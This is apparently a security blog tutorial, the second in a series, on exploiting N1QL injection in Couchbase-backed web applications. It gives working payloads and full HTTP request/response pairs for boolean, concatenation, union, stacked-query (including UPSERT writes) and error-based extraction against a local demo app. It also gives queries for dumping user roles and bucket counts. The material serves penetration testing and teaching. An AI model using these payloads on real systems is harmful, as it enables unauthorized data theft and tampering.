N1QL Injection - Part 2 // FelSec

Introduction

In the last post we delved into the fundamentals of N1QL, N1QL injection, and identifying vulnerable endpoints (Part 1). In this post, we’re shifting focus to exploiting N1QL injection, and covering some handy techniques to streamline the process.

Much like classic SQL injection, data extraction follows the process of identifying valid tables (buckets within Couchbase) and using the available functions to request the fields and data. One of the big benefits offered by the N1QL query language, and there are a few from an attackers perspective, is the ability to use the BASE64 and ENCODE_JSON functions that return the data either base64 encoded or in JSON format.

Exploit Types

There are 4 main methods for exploiting N1QL injection:

Boolean-Based
String Concatenation
Union-Based
Stacked Queries

There is a 5^th method, Error-Based, which can be used for extracting information about N1QL queries but it has limited ability to extract data from the database. We will loosely cover this one further down in the post but it is not that useful when compared to the other ones above.

One small blessing with N1QL injection is that there are no Time-Based exploitation methods!!

Yay!

This is largely due to N1QL not having delay or waitfor functions.

Boolean-Based

Boolean-based N1QL injection, much like standard SQLi, is where an attacker uses boolean conditions (1=1, ’a’=’b’, etc.) to manipulate the database into returning a true or false response (for example, returning a valid response compared to return an empty response or an error), gradually revealing the data from the database.

This method is generally used when the HTTP response do not contain the results of the relevant N1QL query or any database error details. One big downside to this method is that it can be very slow, depending on the amount of data we are attempting to retrieve from the database.

Now that we know what this is, how do we use it?

Here we have two options, each with their own trade-offs:

Option 1: Use the BASE64 function. Quicker due to the smaller character set but requires us to check the length or compare the result to a specific string (W10=) to determine if we have an empty JSON array.
Option 2: Use the ENCODE_JSON function. Slower due to the bigger character set required, but quicker to identify valid responses as we can check for the { and } at specific locations.

Both are valid and ultimately it is down to personal preference which method you go for. I, personally, found option 1 to work more reliably for me so that is the one I will demonstrate here.

Both methods use the same base payload:

AND SUBSTR([BASE64|ENCODE_JSON]((<query>)),<character position to check>,1)='<character>'

For example:

AND SUBSTR(BASE64((select * from system:my_user_info)),0,1)='W'

Request - Fail:

GET /api/blog/p1'AND%20SUBSTR(BASE64((select%20*%20from%20system:my_user_info)),0,1)='A HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response - Fail:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 12
Connection: close

[{"$1":[]}]

Request - Success:

GET /api/blog/p1'AND%20SUBSTR(BASE64((select%20*%20from%20system:my_user_info)),0,1)='W HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response - Success:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[
  {
    "$1": [
      {
        "content": "Coffee is known to boost energy levels and improve mental alertness.",
        "id": "p1",
        "title": "Coffee Benefits"
      }
    ]
  }
]

This method can also be used to get the length of the encrypted payload, which can then be used to make retrieving the data more efficient.

Payload:

AND LEN(BASE64((select * from system:my_user_info)),0,1)=<size>;--

Request:

GET /api/blog/p1'AND%20LEN(BASE64((select%20*%20from%20system:my_user_info)))=880)-- HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[
  {
    "$1": [
      {
        "content": "Coffee is known to boost energy levels and improve mental alertness.",
        "id": "p1",
        "title": "Coffee Benefits"
      }
    ]
  }
]

String Concatenation

String concatenation based N1QL injection is similar to boolean-based N1QL injection, however rather than just relying on the true or false statements to control the output we can choose to create a valid or an invalid query value based on a boolean statement.

In the case of the N1QL query language this can be achieved either using the String function REPLACE or searched case expressions (Searched Case Expressions).

The following payloads show how these functions can be used:

p'||REPLACE(SUBSTR(BASE64((select b.* from blog_posts as b order by meta().id limit 1 offset 0)),0,1),'W','')||'1

p'||(SELECT CASE WHEN SUBSTR(BASE64((select b.* from blog_posts as b order by meta().id limit 1 offset 0)),0,1)='W'THEN'1'ELSE''END)

In both cases we can take a known value that returns a valid response and use string concatenation to add or insert a character depending on the output of our injected query. For example, inserting the character ‘!’ for a false statement or an empty string for a true statement. This in turn makes the parent query fail or succeed allowing for the extraction of data.

Request - Fail:

GET /api/blog/p'||REPLACE(SUBSTR(BASE64((select%20b.*%20from%20blog_posts%20as%20b%20order%20by%20meta().id%20limit%201%20offset%200)),0,1),'A','')||'1 HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response - Fail:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 12
Connection: close

[{"$1":[]}]

Request - Success:

GET /api/blog/p'||REPLACE(SUBSTR(BASE64((select%20b.*%20from%20blog_posts%20as%20b%20order%20by%20meta().id%20limit%201%20offset%200)),0,1),'W','')||'1 HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response - Success:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 130
Connection: close

[
  {
    "$1": [
      {
        "content": "Coffee is known to boost energy levels and improve mental alertness.",
        "id": "p1",
        "title": "Coffee Benefits"
      }
    ]
  }
]

Union-Based

Union-based N1QL injection is where we use the UNION keyword to combine two N1QL queries into a single response. Much like SQLi this method is only viable when the data is returned in the HTTP response; however, unlike standard SQLi, which has a few restrictions when performing union-based attacks (the queries must return the same number of columns and the data types must be compatible), N1QL has no restrictions when performing union-based attacks. In the N1QL query language, the purpose of the UNION keyword is to combine two or more documents into a new single document for use by the target application, in a similar way that fragments are used in GraphQL.

As attackers, we can use this feature of the language to quickly and easily extract large amounts of data from the database.

For example:

Payload:

p1' union select*from system:my_user_info where 'testing'='testing

Request:

GET /api/blog/p1'%20union%20select*from%20system:my_user_info%20where%20'testing'='testing HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 789
Connection: close

[
  {
    "$1": [
      {
        "content": "Coffee is known to boost energy levels and improve mental alertness.",
        "id": "p1",
        "title": "Coffee Benefits"
      },
      {
        "my_user_info": {
          "domain": "local",
          "external_groups": [],
          "groups": [],
          "id": "fletcher_one",
          "password_change_date": "2024-04-17T09:30:35.000Z",
          "roles": [...[SNIPPED]...],
          "uuid": "071cf34e-5415-466f-87b9-c80397322d58"
        }
      }
    ]
  }
]

Stacked Queries

Stacked queries is where we inject multiple queries into a single statement by terminating the initial query. In N1QL injection stacked queries can be used in a few different ways.

Firstly, we can use this method in the same way we would for normal SQL injection. Terminating the original query and appending additional queries to perform various actions on the database (add, remove or modify data, delete buckets, etc.). For example:

value';UPSERT INTO bucket (KEY, VALUE) VALUES("injected-1", {"injected":"stacked-query"}) RETURNING 'INJECTED

Note: In order to use the UPSERT keyword the user must have the Query Update and Query Insert privileges.

Secondly, if the initial query is surrounded in brackets () then we can use the stacked queries in a similar way to union-based N1QL injection to append our additional queries and have the output returned alongside the original data. For example:

Payload:

p1'),(select * from system:my_user_info where 'testing'='testing

Request:

GET /api/blog/p1'),(select*from%20system:my_user_info%20where%20'testing'='testing HTTP/1.1
Host: localhost
User-Agent: FelSec-Example

Response:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.8
Content-Type: application/json
Content-Length: 796
Connection: close

[
  {
    "$1": [
      {
        "content": "Coffee is known to boost energy levels and improve mental alertness.",
        "id": "p1",
        "title": "CoffeeBenefits"
      }
    ],
    "$2": [
      {
        "my_user_info": {
          "domain": "local",
          "external_groups": [],
          "groups": [],
          "id": "fletcher_one",
          "password_change_date": "2024-04-17T09:30:35.000Z",
          "roles": [...[SNIPPED]...],
          "uuid": "071cf34e-5415-466f-87b9-c80397322d58"
        }
      }
    ]
  }
]

Error-Based

Error-based N1QL injection is similar to standard SQL injection, however there is one key difference. In normal error-based SQL injection the error returns the full SQL query strings, full query results, or information that can be used in further injection attempts but with Couchbase and the N1QL query language only a portion of the affected query is returned. This can still allow us to retrieve information about the backend database (bucket names, field names, conditions being used, etc.) that we can use in further exploit attempts, but offers limited information and benefits compared to other methods.

Example Error Messages

Missing Bucket

Request:
curl http://localhost:8093/query/service -d 'statement=SELECT name FROM `travel-sample`.inventory.motel LIMIT 1' -u Administrator:Passw0rd

Response:
{
  "requestID": "0fcb0b4c-cc23-4ece-b848-c1b9af70c78f",
  "errors": [
    {
      "code": 12003,
      "column": 18,
      "line": 1,
      "msg": "Keyspace not found in CB datastore: default:travel-sample (near line 1, column 18) - cause: No bucket named travel-sample"
    }
  ],
  "status": "fatal",
  "metrics": {
    "elapsedTime": "22.151518ms",
    "executionTime": "21.756576ms",
    "resultCount": 0,
    "resultSize": 0,
    "serviceLoad": 6,
    "errorCount": 1
  }
}

Invalid Quoted String

Request:
curl http://localhost:8093/query/service -d 'statement=SELECT name FROM `beer-sample` WHERE name=\'abcsc ' -u Administrator:Passw0rd

Response:
{
  "requestID": "7fe26cff-ee26-4cfb-b83e-f49f386fe626",
  "errors": [
    {
      "code": 3000,
      "column": 43,
      "line": 1,
      "msg": "syntax error: invalid quoted string - missing closing quote - line 1, column 43, near '...-sample` WHERE name=', at: 'abcsc"
    }
  ],
  "status": "fatal",
  "metrics": {
    "elapsedTime": "4.34463ms",
    "executionTime": "3.636005ms",
    "resultCount": 0,
    "resultSize": 0,
    "serviceLoad": 6,
    "errorCount": 1
  }
}

Invalid Escape Identifier

Request:
curl http://localhost:8093/query/service -d 'statement=SELECT name FROM `beer-sample`.`name ' -u Administrator:Passw0rd

Response:
{
  "requestID": "9738c09b-c463-45f7-bf9d-b238f642f982",
  "errors": [
    {
      "code": 3000,
      "column": 32,
      "line": 1,
      "msg": "syntax error: invalid escaped identifier - missing closing quote - line 1, column 32, near '...FROM `beer-sample`.', at: `name"
    }
  ],
  "status": "fatal",
  "metrics": {
    "elapsedTime": "2.863714ms",
    "executionTime": "2.583399ms",
    "resultCount": 0,
    "resultSize": 0,
    "serviceLoad": 6,
    "errorCount": 1
  }
}

Ambiguous Field

Request:
curl http://localhost:8093/query/service -d 'statement=SELECT name FROM `beer-sample`.name ' -u Administrator:Passw0rd

Response:
{
  "requestID": "883093d4-23aa-433d-b99f-9d5c19b12b80",
  "errors": [
    {
      "code": 3080,
      "column": 18,
      "line": 1,
      "msg": "Ambiguous reference to field 'beer-sample' (near line 1, column 18)."
    }
  ],
  "status": "fatal",
  "metrics": {
    "elapsedTime": "4.891704ms",
    "executionTime": "4.482279ms",
    "resultCount": 0,
    "resultSize": 0,
    "serviceLoad": 6,
    "errorCount": 1
  }
}

As you can see these error messages give us snippets of information that can be used to build or adjust our injection payloads, but do not return any query results.

Challenges and Useful Tricks

Getting the Bucket Record Count

One main challenge I came across when attempting to exfiltrate data during assessments was knowing how many records or documents were in a particular bucket. While you could, and I did, take the blind approach and keep iterating over the records until no data or empty responses were returned ([{}]).

However, after a bit of digging in the N1QL documentation and doing some experimentation, I found a couple of reliable methods.

Method 1: The SQL Way

The first method was to use the COUNT function to just count the number of records in the bucket.

SELECT COUNT(*) FROM BUCKETNAME

While this approach is simple and does work, it requires the query to get and process all the records. Meaning that the greater number of records the longer it takes to process the query, potentially causing the web requests to timeout.

There is a better way…

Method 2: system:keyspaces_info

Couchbase has several system keyspaces that are used to hold information about various aspects of the database (users, roles, nodes, buckets, etc.). A lesser documented one is keyspaces_info, which contains the same information as the keyspaces keyspace (namespace info, bucket name, id and path), but crucially also contains the field count which is a count of all the records within each bucket.

Since this information is automatically updated and maintained by the database server, it is faster to get and has less impact on the server.

By using the following query we can get the record count for any bucket in the database:

SELECT count FROM system:keyspaces_info where name='BUCKET NAME'

Query: SELECT count from system:keyspaces_info where name='beer-sample';

Output:
[
  {
    "count": 7303
  }
]

Checking User Permissions

Couchbase has a fairly granular permission system and to access certain functionality or keyspaces, the user performing the query must be assigned certain roles.

Meaning that the ability to check the roles assigned to the user is really useful. This can be done a few ways:

The first way is to dump the whole system:my_user_info table and reviewing the roles assigned to the current user. This can be great for getting an overall view of what buckets they are allowed to access and what actions they are allowed to perform, e.g. query only, query and update, update only, etc.

Query: SELECT * FROM system:my_user_info

Output:
[
  {
    "my_user_info": {
      "domain": "local",
      "external_groups": [],
      "groups": [],
      "id": "fletcher_one",
      "password_change_date": "2024-04-17T09:30:35.000Z",
      "roles": [
        {
          "bucket_name": "bucket2",
          "collection_name": "*",
          "origins": [
            {
              "type": "user"
            }
          ],
          "role": "select",
          "scope_name": "*"
        },
        {
          "bucket_name": "bucket1",
          "collection_name": "*",
          "origins": [
            {
              "type": "user"
            }
          ],
          "role": "select",
          "scope_name": "*"
        },
        {
          "bucket_name": "bucket2",
          "collection_name": "*",
          "origins": [
            {
              "type": "user"
            }
          ],
          "role": "data_reader",
          "scope_name": "*"
        },
        {
          "bucket_name": "bucket1",
          "collection_name": "*",
          "origins": [
            {
              "type": "user"
            }
          ],
          "role": "data_reader",
          "scope_name": "*"
        }
      ],
      "uuid": "071cf34e-5415-466f-87b9-c80397322d58"
    }
  }
]

However, if we want to check for a specific role or permission this can be done with the following query:

select r from system:my_user_info UNNEST roles as r where r.`role`='ROLE'

We can monitor the responses to identify whether the user has the requested permission. If the user has a specific role then the role information will be returned, including the buckets this permission applies to, whereas an empty response is returned when the user does not have the role. For example:

Valid Role

Query: select r from system:my_user_info UNNEST roles as r where r.`role`='data_reader'

Output:
[
  {
    "r": {
      "bucket_name": "bucket2",
      "collection_name": "*",
      "origins": [
        {
          "type": "user"
        }
      ],
      "role": "data_reader",
      "scope_name": "*"
    }
  },
  {
    "r": {
      "bucket_name": "bucket1",
      "collection_name": "*",
      "origins": [
        {
          "type": "user"
        }
      ],
      "role": "data_reader",
      "scope_name": "*"
    }
  }
]

Invalid or Unassigned Role

Query: select r from system:my_user_info UNNEST roles as r where r.`role`='admin'

Output:
[]

A full breakdown of the Couchbase roles can be found here: Couchbase Roles

Length of Length

A useful trick I learned for helping with boolean-based N1QL injection, particularly when trying to identify the length of the data being returned, was that the LEN function can be stacked to get the length of the length. Meaning that:

For 0-9 the length would be 1;
For 10-99 the length would be 2;
For 100-999 the length would be 3
etc.

This, along with the fact that a Base64 string will always be a multiple of 4, allows us to heavily reduce the number of requests required to obtain the length of the data.

Continue reading part 3 for some interesting features of N1QL and Couchbase, more exploits, and some additional useful tools and resources. Part 3